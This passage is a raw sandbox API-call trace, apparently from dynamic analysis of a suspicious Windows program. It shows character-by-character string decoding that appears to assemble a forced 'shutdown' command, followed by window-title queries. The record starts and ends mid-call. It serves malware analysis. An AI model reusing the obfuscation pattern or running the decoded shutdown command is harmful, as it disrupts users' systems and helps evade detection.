cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0179.903] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.904] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.904] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.905] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.905] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.906] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.906] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.907] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.907] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.908] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.908] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.909] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.909] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.910] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.910] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.911] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.911] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.912] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.912] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.913] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.913] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.914] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.914] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.915] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.962] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.962] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.963] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.963] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.964] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.964] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.964] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.965] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.965] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.966] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.966] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.967] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.967] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.968] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.968] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.969] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.969] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.969] GetForegroundWindow () returned 0x20086 [0179.969] GetLastError () returned 0x0 [0179.970] SysStringLen (param_1=" ") returned 0xff [0179.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.970] SysStringLen (param_1=" ") returned 0xff [0179.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.970] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.970] GetLastError () returned 0x0 [0179.970] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.971] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.971] SysStringLen (param_1="Pro") returned 0x3 [0179.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x116859c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0179.971] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0179.972] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0179.972] GetFocus () returned 0x0 [0179.972] lstrlenA (lpString="Pro") returned 3 [0179.972] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0179.972] IsWindow (hWnd=0x103c4) returned 1 [0179.973] IsWindow (hWnd=0x103c4) returned 1 [0179.973] IsWindow (hWnd=0x103c4) returned 1 [0179.973] IsWindow (hWnd=0x103c4) returned 1 [0179.973] GetFocus () returned 0x0 [0179.974] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0179.974] GetFocus () returned 0x0 [0179.974] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0179.974] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0179.974] GetFocus () returned 0x0 [0179.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0179.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0179.975] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.975] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.976] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0179.976] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.977] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0179.977] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.978] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0179.978] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.979] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0179.979] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.980] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0179.980] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.981] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0179.981] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.981] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0179.982] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.983] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.983] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.983] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.984] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.984] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.985] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.985] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.985] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, 